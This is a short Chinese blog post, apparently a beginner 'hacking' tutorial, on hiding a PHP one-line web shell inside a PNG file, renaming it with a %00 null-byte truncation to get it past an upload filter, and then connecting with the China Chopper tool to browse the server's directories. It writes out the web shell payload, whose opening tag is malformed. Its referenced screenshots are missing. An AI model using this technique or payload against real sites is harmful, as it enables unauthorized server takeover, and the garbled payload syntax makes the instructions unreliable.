Hi，大家好，我是编程小6，很荣幸遇见你，我把这些年在开发过程中遇到的问题或想法写出来，今天说一说手把手教你黑客入门，带你进入新世纪的黑客领域,希望能够帮助你!!!。

在kali的里面随机找一张png结尾的图片，然后重命名一下改成1.php%00.png。

改成这样的名字！！

然后用编辑器编辑一下！

在空白处写入一句话木马！！<%php @eval($_POST[pass]);?>

像这样：

然后保存！

打开burpsuit抓个包看看！！

可惜了，我们用了%00截断不需要改包！

这样就上传成功！！！

在菜刀地址上填上上路径！！再填上上密码！！！

就可以看见我的服务器里面的目录了，因为我的centos 7 所以罗！

然后我们进入我的服务器端看看！！

画红线的就是我们上传的木马！！！

今天的分享到此就结束了，感谢您的阅读，如果确实帮到您，您可以动动手指转发给其他人。